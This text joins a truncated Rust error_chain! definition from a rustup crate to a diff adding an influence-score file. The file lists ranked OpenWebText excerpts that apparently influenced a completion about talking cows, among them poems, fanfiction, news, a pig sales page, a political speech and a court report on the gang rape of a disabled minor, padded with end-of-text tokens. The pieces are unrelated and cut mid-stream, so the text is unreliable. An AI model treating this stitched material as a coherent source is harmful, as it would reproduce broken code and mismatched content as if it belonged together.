Define the error types and conversions for this crate error_chain! { // The type defined for this error. These are the conventional // and recommended names, but they can be arbitrarily chosen. types { Error, ErrorKind, ChainErr, Result; } // Automatic conversions between this error chain and other // error chains. In this case, it will e.g. generate an // `ErrorKind` variant called `Dist` which in turn contains // the `rustup_dist::ErrorKind`, with conversions from // `rustup_dist::Error`. // // This section can be empty. links { rustup_dist::Error, rustup_dist::ErrorKind, Dist; rustup_utils::Error, rustup_utils::ErrorKind, Utils; } // Automatic conversions between this error chain and other // error types not defined by the `error_chain!`. These will be // boxed as the error cause and wrapped in a new error with, // in this case, the `ErrorKind::Temp` variant. // // This section can be empty. foreign_links { temp::Error, Temp, "temporary file error"; } // Define additional `ErrorKind` variants +================================================================================ +Rank = 99; Score = 6750208.0 +<|begin_of_text|>NEW YORK — It's all about the goals in MLS. Literally. + +The league announced on Wednesday a new wrinkle to its playoff format that will be implemented this season, honoring goals scored as the first tiebreaker when two or more teams are even on points in the standings. + +In fact, goals scored currently has the Houston Dynamo (35 goals scored) ahead of Sporting Kansas City (28 goals scored) atop the Eastern Conference, although both clubs are tied on 40 points. + +Total goals scored was only the third tiebreaker last season with head-to-head record and goal differential taking precedence. In fact, head-to-head record was the first criteria used to rank teams tied on points in 2011, but it became less relevant with the switch to an unbalanced, conference-based schedule. + +The league's Board of Governors approved the following new set of tiebreakers to be used beginning with the current 2012 season "in part to encourage attacking play," according to a league statement: + +1) Most total goals scored + +2) Greatest goal differential + +3) Fewest disciplinary points + +4) Most road goals scored + +5) Greatest road goal differential + +6) Most home goals scored + +7) Greatest home goal differential + +8) Coin toss (for 2 teams) or drawing of lots (3 or more teams)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> diff --git a/examples/openwebtext/files/scores_raw_margin/cow.txt b/examples/openwebtext/files/scores_raw_margin/cow.txt new file mode 100644 index 0000000..a6939f0 --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/cow.txt @@ -0,0 +1,2348 @@ +Query Sequence: +Prompt:If cows could suddenly speak, their first words would probably be:; Completion: 'I am hungry.' + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 2752512.0 +<|begin_of_text|>Autoplay next video + +The neighbors' dog will not stop barking. + +He is barking the same high, rhythmic bark + +that he barks every time they leave the house. + +They must switch him on on their way out. + +The neighbors' dog will not stop barking. + +I close all the windows in the house + +and put on a Beethoven symphony full blast + +but I can still hear him muffled under the music, + +barking, barking, barking, + +and now I can see him sitting in the orchestra, + +his head raised confidently as if Beethoven + +had included a part for barking dog. + +When the record finally ends he is still barking, + +sitting there in the oboe section barking, + +his eyes fixed on the conductor who is + +entreating him with his baton + +while the other musicians listen in respectful + +silence to the famous barking dog solo, + +that endless coda that first established + +Beethoven as an innovative genius.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 1; Score = 2293760.0 +<|begin_of_text|>Tear Droplet: Just a quick intro from yours truly, the author. I know I haven't updated any my fanfiction in ages and yet I'm starting a new one. I just felt like I wanted to upload something new. I have a bunch of ideas to type out and no motivation to type. I'm amazed I was even able to type this (even though it was short). I don't have this story sorted out yet. I only have the ending in my head lol…There shouldn't be too many grammatical errors either since I was able to do a mini read through cause it was short. + +Enjoy ;). One of my favorite Pretty Cure couples. + +Prologue: The end of King Jikochu + +And that was it. Cure Heart's last move, My Sweet Heart, defeated Proto Jikochu as well as cleansing all the selfish psyches that were in him. Bel, after being overrun by King Jikochu's power and likewise being defeated, was weakened into the state of a mouse. Marmo, discovering his pathetic state, picked him up by his tail and sighed. "Look at you" she said. + +"How pathetic" Ira commented. + +"Whatever, I'll just sleep for 10,000 years again to build up my energy" Bel replied. + +"Huh!? Another 10,000 years!?" Ira exclaimed. He turned to face where the Cures were sitting in the far distance. + +"Oh well" he said as he started particularly at a blue haired girl laughing away. "They're still here." + +"What are you doing?" Marmo asked bringing Ira back to reality. "Let's go" she said softy. + +"I know" he replied. He got up and started to float towards Marmo who was flying away. + +"I'm hungry" Bel commented. + +"Just eat some leftovers" Ira replied as they all teleported away, back to their hideout. + +'It's okay' Ira thought to himself as the teleportation started to bring them back. 'This was inevitable in the end.' + +... + +The three returned back to their hideout, the bowling alley. The hideout was their own dimension of space; only connecting to Trump Kingdom when they wanted. Now that Trump Kingdom was freed from King Jikochu's control, it wasn't safe for them to have it conveniently accessed by the citizens so they broke the connection. + +Marmo immediately released Bel's tail when they returned. Being in his mouse form, Bel was able +================================================================================ +Rank = 2; Score = 2113536.0 +<|begin_of_text|>In 2008, the world’s media was captivated by a study apparently showing that cows like to align themselves with magnetic fields. But attempts to replicate this finding have left two groups of researchers at loggerheads, highlighting the problems faced by scientists working to replicate unusual findings based on new methods of data analysis. + +Magneto-reception has been detected in animals from turtles to birds. Three years ago, Hynek Burda, a zoologist at the University of Duisburg-Essen, Germany, and his colleagues added cattle to the magnetic family with a paper in Proceedings of the National Academy of Sciences. The team used data from Google Earth to show that domestic cattle seem to prefer to align their bodies along Earth’s magnetic field lines1, and showed a similar phenomenon in field observations of deer. + +E. ELISSEEVA/GLOWIMAGES.COM + +A follow-up study by Burda and his colleagues showed no such alignment near electric power lines, which might be expected to disrupt magneto-sensing in cattle2. + +Cow conundrum + +Earlier this year, a group of Czech researchers reported their failed attempt to replicate the finding using different Google Earth images3. The Czech team wrote in the Journal of Comparative Physiology A: “Two independent groups participated in our study and came to the same conclusion that in contradiction to the recent findings of other researchers, no alignment of the animals and of their herds along geomagnetic field lines could be found.” + +“When in 2008 the authors started to announce their surprising findings in [the] mass media, we got the impression that this is not the way science should be made and we took a closer look. We found out that it is not as fantastic as it was presented,” says Lukas Jelinek, a researcher in the electromagnetic-field department at the Czech Technical University in Prague and one of the authors of the replication attempt. + +In response, Burda and his colleagues reanalysed the replication attempt by Jelinek and his colleagues4. Burda says that half of the Jelinek team's data should be excluded because some of the pastures are on slopes or near high-voltage power lines, for example, or because the images are too poor to make out cattle, or appear to contain hay bales or sheep instead. “One half of their data is just noise,” says Burda. + +In addition, Burda's group looked at herds as a whole, whereas Jelinek’s team analysed individual cows. “Of the data that were useable, they looked only at +================================================================================ +Rank = 3; Score = 2023424.0 +<|begin_of_text|>At Pampered Piglets each of our teacup piglets are raised inside of our house. They are brought up to be comfortable around children and other pets. Unlike some other websites offering teacup pigs We do not broker out other piglets!!!! + +Be very careful when it comes to buying a teacup pig. There are several breeders pretending to have teacup pigs for sale when they are really just selling pot belly pigs. + +If you are finding "Teacup pigs" for under $1,000 dollars they most likely are just pot belly pigs. Which will grow to 150 LBS or more!! + +Teacup piglets each have their very own unique personality. Some like to be very bossy and feisty, some like to be very sweet and cuddly. They love to have their bellies rubbed and love to rub their little piggy nose on things. They grow more comfortable the more they get to know you and usually will have a favorite that they seem to love the most. + +The Teacup piglet’s tail will waggle when they are happy or excited. They love treats! They usually will squeal when they need to go to the bathroom. They are surprisingly litter box trained at just a few days old and tend to be cleaner pets than cats or dogs. They recognize their own name just weeks after they are born and love to follow you around. + +Teacup pigs are extremely playful and will get along with other pets very well. The teacup piglets are able to jump a couple feet in the air with their short little stubby legs even though they are just a few inches tall. They love to cuddle under blankets and tend to be a little ornery when they are hungry or tired. + +We will ship your teacup pig to you no matter where you live. Each teacup pig comes with a guarantee that the piglet is healthy.. + +The teacup pigs can be bottle fed at 2 weeks old. They love their milk and will stretch out and gulp down their bottle of milk. + +Teacup piglets can range in price from $1,500 and up. Prices vary depending on size, color, and gender. + +You will be extra pleased with how friendly and loving your teacup pig is. They will brighten up your day!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 4; Score = 1933312.0 +<|begin_of_text|>But what happens if ambition fails to counteract ambition? What happens if stability fails to assert itself in the face of chaos and instability? If decency fails to call out indecency? Were the shoe on the other foot, we Republicans—would we Republicans—meekly accept such behavior on display from dominant Democrats? Of course we wouldn’t, and we would be wrong if we did. + +When we remain silent and fail to act when we know that that silence and inaction is the wrong thing to do—because of political considerations, because we might make enemies, because we might alienate the base, because we might provoke a primary challenge, because ad infinitum, ad nauseum—when we succumb to those considerations in spite of what should be greater considerations and imperatives in defense of the institutions and our liberty, we dishonor our principles and forsake our obligations. Those things are far more important than politics. + +Now, I am aware that more politically savvy people than I will caution against such talk. I am aware that a segment of my party believes that anything short of complete and unquestioning loyalty to a president who belongs to my party is unacceptable and suspect. + +If I have been critical, it is not because I relish criticizing the behavior of the president of the United States. If I have been critical, it is because I believe it is my obligation to do so, and as a matter of duty of conscience. The notion that one should stay silent as the norms and values that keep America strong are undermined and as the alliances and agreements that ensure the stability of the entire world are routinely threatened by the level of thought that goes into 140 characters—the notion that we should say and do nothing in the face of such mercurial behavior is ahistoric and, I believe, profoundly misguided. + +A president—a Republican president—named Roosevelt had this to say about the president and a citizen’s relationship to the office: + +“The President is merely the most important among a large number of public servants. He should be supported or opposed exactly to the degree which is warranted by his good conduct or bad conduct, his efficiency or inefficiency in rendering loyal, able, and disinterested service to the nation as a whole.” He continued, “Therefore, it is absolutely necessary that there should be full liberty to tell the truth about his acts, and this means that it is exactly as necessary to blame him when he does wrong as to praise him when he does right. Any other attitude in an American citizen is both base and servile.” President Roosevelt +================================================================================ +Rank = 5; Score = 1892352.0 +<|begin_of_text|>Editor's Note: Follow live blogging on "This Just In" and the latest tweets from CNN correspondents from the protests. Send your video, images to CNN iReport. + +Cairo, Egypt (CNN) -- Egyptians on Saturday cleared burned cars, garbage and debris that accumulated over 18 days at Tahrir Square, a sign that Cairo and the rest of the country were ready to rebuild and get back to work while the country formulates a plan for governance. + +A day after President Hosni Mubarak stepped down, employees and businesses readied themselves for Sunday, the traditional start of the work week. The country's stock market is expected to reopen Wednesday. + +Wael Ghonim, a cyberactivist who is a Google executive on leave, wrote Friday on his Twitter account, "Dear Egyptians, Go back to your work on Sunday, work like never before and help Egypt become a developed country." + +Volunteers repainted black-and-white-striped street curbs around a monument by the Egyptian Museum, which had been on the front line in street battles between Mubarak's foes and supporters. Police were starting to move barricades and trying to restore vehicle traffic at Tahrir Square, where many protesters vowed to remain. + +"It's time to start rebuilding the country," protester Yehya Kheireldin said, pointing to the hundreds of volunteers armed with brooms who are sweeping away the debris left by the sit-in. + +In the immediate future, the military -- largely respected by Egyptians -- will have to grapple with guiding the country of more than 80 million people through the transition amid massive problems of unemployment and considerable economic underdevelopment, said CNN correspondent Ben Wedeman, who is based in Cairo. + +Former Egyptian Trade Minister Rachid Mohammed Rachid recently told CNN that the new government must show it is business-friendly. + +The African nation virtually shut down during the unrest, losing vital tourism dollars as well. + +CNN's Nic Robertson reported Saturday that citizens who make their living off foreign tourists are angry. + +"Young boys 17 years old and 18 years old, they want to say, 'We are hungry, we want to eat, we want to work,' " said businessman Ayman el Myonir. + +Businessmen near the famed Pyramids say about 50,000 people are employed in the tourism industry, Robertson reported. + +"We try to help each other. We would like to put our hands together, and to help each other," said el Myonir. + +As thousands reveled in their improbable revolution, the nation's newly +================================================================================ +Rank = 6; Score = 1875968.0 +<|begin_of_text|>$\begingroup$ + +Sam sat with his eyes closed for several minutes, then said softly: + +"I have many names, and none of them matter." He opened his eyes slightly then, but he did not move his head. He looked upon nothing in particular. + +"Names are not important," he said. "To speak is to name names, but to speak is not important. A thing happens once that has never happened before. Seeing it, a man looks on reality. He cannot tell others what he has seen. Others wish to know, however, so they question him saying, 'What is it like, this thing you have seen?' So he tries to tell them. Perhaps he has seen the very first fire in the world. He tells them, 'It is red, like a poppy, but through it dance other colors. It has no form, like water, flowing everywhere. It is warm, like the sun of summer, only warmer. It exists for a time on a piece of wood, and then the wood is gone, as though it were eaten, leaving behind that which is black and can be sifted like sand. When the wood is gone, it too is gone.' Therefore, the hearers must think reality is like a poppy, like water, like the sun, like that which eats and excretes. They think it is like to anything that they are told it is like by the man who has known it. But they have not looked upon fire. They cannot really know it. They can only know of it. But fire comes again into the world, many times. More men look upon fire. After a time, fire is as common as grass and clouds and the air they breathe. They see that, while it is like a poppy, it is not a poppy, while it is like water, it is not water, while it is like the sun, it is not the sun, and while it is like that which eats and passes wastes, it is not that which eats and passes wastes, but something different from each of these apart or all of these together. So they look upon this new thing and they make a new word to call it. They call it 'fire.' + +"If they come upon one who still has not seen it and they speak to him of fire, he does not know what they mean. So they, in turn, fall back upon telling him what fire is like. As they do, they know from their own experience that what they are telling him is +================================================================================ +Rank = 7; Score = 1867776.0 +<|begin_of_text|>You may have heard that diets don’t work, but you may not fully understand why. After all, most people can eat less and move more and will lose weight! + +It’s true, short-term weight loss is possible for most people. However, after the body loses a certain amount of weight, a variety of compensatory mechanisms kick into high gear to restore us to what is known as our “set point weight”. Our set point weight is actually a range of 15-20 pounds where each individual’s body feels happiest, and it occurs when you eat intuitively, when you are hungry, and according to your signals of hunger and fullness. + +Essentially, as we lose weight, our body realizes, “whoa, I’m starving!” and it does everything it can to gain weight to the point where it feels comfortable again. Just like our bodies maintain homeostasis with regard to things like our internal temperature, they also like to maintain our weight. + +1 Our bodies fight against us the moment they see our weight shift significantly lower. These weight loss-induced compensatory mechanisms, which are orchestrated by a part of our brain known as the hypothalamus, are the reason why in a major meta-analysis of dieting studies, the average amount of weight lost was a mere 0.9 kg.Our bodies fight against us the moment they see our weight shift significantly lower. + +2 (It’s also valuable to note that the average weight lost in dieting studies is likely artificially high, due to most weight loss studies having major design flaws. Factors in this include subject selection biases, people dropping out due to the shame of weight gain, poor data gathering, and people going on multiple diets in succession!) + +Read on to understand each of them in more detail. + +When you diet to lose weight… + +1) Your brain notices food more. 3 Kinda cruel, isn’t it? But it’s true: when you are depriving yourself of food, your brain actually starts to notice food more. Not only that — your brain pays more attention to the food when it comes across it. This is all done by the amazing hypothalamus and a variety of hormones. + +2) Your tastes change so more foods are appealing. Dieting even leads to our hypothalamus to change the way we perceive tastes so a wider variety of food is appealing. 4 It can also make you want high fat food more, because fat contains more calories than other macronutrients. + +3) Your appetite increases & you feel less satiated when you eat. +================================================================================ +Rank = 8; Score = 1687552.0 +<|begin_of_text|>At some point in my daughter’s life, when she’s old enough to avoid being traumatized by the thought of her parents’ sex life (if that’s even possible), I’ll point to a beer bottle and say, “That helped me make you.” + +If nature and nurture have worked their magic, she’ll laugh. And then I’ll tell this tale. + +My wife and I married in August 2011. We were each 33, an age when last calls are less important than waking up for work. We were two peas in a pod, ready for a third. In your thirties, making a baby is not as simple as throwing a fifth of Beam in the backseat of a car, removing your pants, and taking a ride to kingdom come. Time was required. Months disappeared. Our spirits lagged, beleaguered by one negative pregnancy test after another. After trying for some time, copulation becomes obligation. Beer helps. Oh, does it help. + +One morning, after drinking myself into a state of disrepair, I awoke to a scream. Our dog barked bloody murder. “We’re pregnant!” my wife shouted, her words bringing pain and pleasure. Nine months later our daughter, Violet, debuted. + +Alcohol is not an ideal coping technique. But damn, does a beer feel mighty good after changing a diaper. + +To celebrate, I drank a Sierra Nevada Celebration. It was not the last one I drank in my daughter’s presence. + +Having a child does not bathe your life in rainbows and magic-hour sunlight. After two days in the hospital (if that long!), you’re sent home with a wailing infant and simple instructions: Don’t shake the baby. You wonder why the nurses repeat that command, over and over…until your child will not stop screaming, and then you get it. You want to shake the baby. A million dollars to stop screaming! But you do not shake the baby. Instead, you soothe her and calmly drink beer. + +Well, at least I drink beer. As a beer journalist and author, I have a built-in excuse. Research. It’s always for research, no matter if I have a deadline or a howling daughter. The howls. They are for several very good reasons. My daughter is hungry. She has a dirty diaper. She wants to be held. She’s tired. She doesn’t like that thing, which it is our job as parents to deduce, Sherlock-style. + +Therapists, I hear you +================================================================================ +Rank = 9; Score = 1523712.0 +<|begin_of_text|>CLARK COUNTY, NV (The Las Vegas Review-Journal) – A 15-year-old boy charged in the gang rape of a 14-year-old special education student will be prosecuted in the adult justice system, a Clark County Family Court judge ruled Wednesday. + +The teen, Leby Urquilla, is one of four boys charged, and the only juvenile to be certified as an adult as of Wednesday. Two adults are also jailed in connection with the case: Jose Mejia-Henriquez, 18, and the boy’s father, Leby Alas-Gomez, 39. + +The victim, who has the mental capacity of a 7- or 8-year-old, told police she was sexually assaulted by at least six males on three separate occasions in November. The accusations came to light after a video depicting the girl being used in group sex acts began circulating around Del Sol Academy in December. + +“They treated this special needs girl like a piece of cattle or property, to do with what they wanted,” Chief Deputy District Attorney Kimberly Adams said Wednesday in a small juvenile courtroom. + +She called the acts “heinous and egregious” while arguing for Urquilla to be tried as an adult. + +Urquilla sat silently as a court interpreter translated Adams’ words into Spanish, often looking down at his lap, then at the judge. + +A key piece of evidence — one of the videos shared throughout the high school — captured part of one gang rape incident, Adams said. + +In the footage, the girl can be seen trying to get up while being sexually assaulted, but “they would push her back down,” Adams said. + +“She repeatedly said to stop, but they don’t,” she said. “She tries to cross her legs while on her stomach, but (Urquilla) separates them.” + +The victim was not at the hearing Wednesday, but her mother wiped away a tear as Adams continued, describing Urquilla as a calculated predator and the girl as “one of the most vulnerable victims of our society.” + +“It appears she was used and groomed by (Urquilla),” Adams said. The girl initially liked Urquilla and wanted to fit in; she often ate lunch with the boys at school. But the relationship was about control, Adams argued. + +“If he said he was hungry, she would give him her lunch,” she said. “Eventually (Urquilla) began to invite (the victim) to his apartment, and initially, she would say no. And then, after several times, she finally said OK.” + +Public +================================================================================ +Rank = 10; Score = 1490944.0 +<|begin_of_text|>I have heard that on one occasion the Blessed One was staying near Rājagaha at the Bamboo Grove, the Squirrels' Sanctuary. And on that occasion Ven. Sāriputta and Ven. Mahā Moggallāna were staying in Pigeon Cave. Then, on a moonlit night, Ven. Sāriputta — his head newly shaven — was sitting in the open air, having attained a certain level of concentration. + +And on that occasion two yakkhas who were companions were flying from north to south on some business or other. They saw Ven. Sāriputta — his head newly shaven — sitting in the open air. Seeing him, the first yakkha said to the second, "I'm inspired to give this contemplative a blow on the head." + +When this was said, the second yakkha said to the first, "Enough of that, my good friend. Don't lay a hand on the contemplative. He's an outstanding contemplative, of great power & great might." + +A second time, the first yakkha said to the second, "I'm inspired to give this contemplative a blow on the head." + +A second time, the second yakkha said to the first, "Enough of that, my good friend. Don't lay a hand on the contemplative. He's an outstanding contemplative, of great power & great might." + +A third time, the first yakkha said to the second, "I'm inspired to give this contemplative a blow on the head." + +A third time, the second yakkha said to the first, "Enough of that, my good friend. Don't lay a hand on the contemplative. He's an outstanding contemplative, of great power & great might." + +Then the first yakkha, ignoring the second yakkha, gave Ven. Sāriputta a blow on the head. And with that blow he might have knocked over an elephant seven or eight cubits tall, or split a great rocky crag. But right there the yakkha — yelling, "I'm burning!" — fell into the Great Hell. + +Now, Ven. Moggallāna — with his divine eye, pure and surpassing the human — saw the yakkha give Ven. Sāriputta a blow on the head. Seeing this, he went to Ven. Sāriputta and, on arrival, said to him, "I hope +================================================================================ +Rank = 11; Score = 1482752.0 +<|begin_of_text|>© Unknown + +It's understandable, as people always like to take a stand, but it's not understandable why you take their side - the children on Israel side are bleeding just the same. It's true that in terms of numbers, more people suffer on their side. It's a simple matter of population density, human shield factors, and fire power. Don't mistake me, I feel sorry for them. I just feel more sorry for my family, my neighbours and friends and country first. It seems you don't. + +© Unknown + +"The renowned Israeli historian revisits the formative period of the State of Israel. Between 1947 and 1949, over 400 Palestinian villages were deliberately destroyed, civilians were massacred, and around a million men, women, and children were expelled from their homes at gunpoint. Denied for almost six decades, had it happened today it could only have been called "ethnic cleansing". Decisively debunking the myth that the Palestinian population left of their own accord in the course of this war, Ilan Pappe offers impressive archival evidence to demonstrate that, from its very inception, a central plank in Israel's founding ideology was the forcible removal of the indigenous population. This book is indispensable for anyone interested in the Middle East." + +"If I knew it was possible to save all the children in Germany by taking them to England, and only half of the children by taking them to Eretz Israel, I would choose the second solution. For we must take into account not only the lives of these children but also the history of the people of Israel." + +Source: Yvon Gelbner, "Zionist policy and the fate of European Jewry", in Yad Vashem studies (Jerusalem, vol. XII), p. 199. + +"The saving of the Jews in Europe did not figure at the head of the list of priorities of the ruling class. It was the foundation of the State which was primordial in their eyes." + +Source: Tom Segev, "Le septième million", Ed. Liana Levi (Paris, 1993), p. 539. + +© Unknown + +© Unknown + +I am ashamed to be an Israeli. There, I said it. And yes, I know better than most that theremany good and kind people in Israel. But what is happening right now in Gaza in the name of those good people CANNOT be tolerated, because it goes against everything humane and decent.Yes, there are deaths on the Israeli side as well, but despite the heart +================================================================================ +Rank = 12; Score = 1458176.0 +<|begin_of_text|>Click to email this to a friend (Opens in new window) + +Hard-partying Andy Dick vowed to stay sober during his recent stint on “Dancing With the Stars.” But once the comic was eliminated, it seems all bets were off. + +Dick was partying his way through the Hamptons last weekend, sources said, and even took one poor 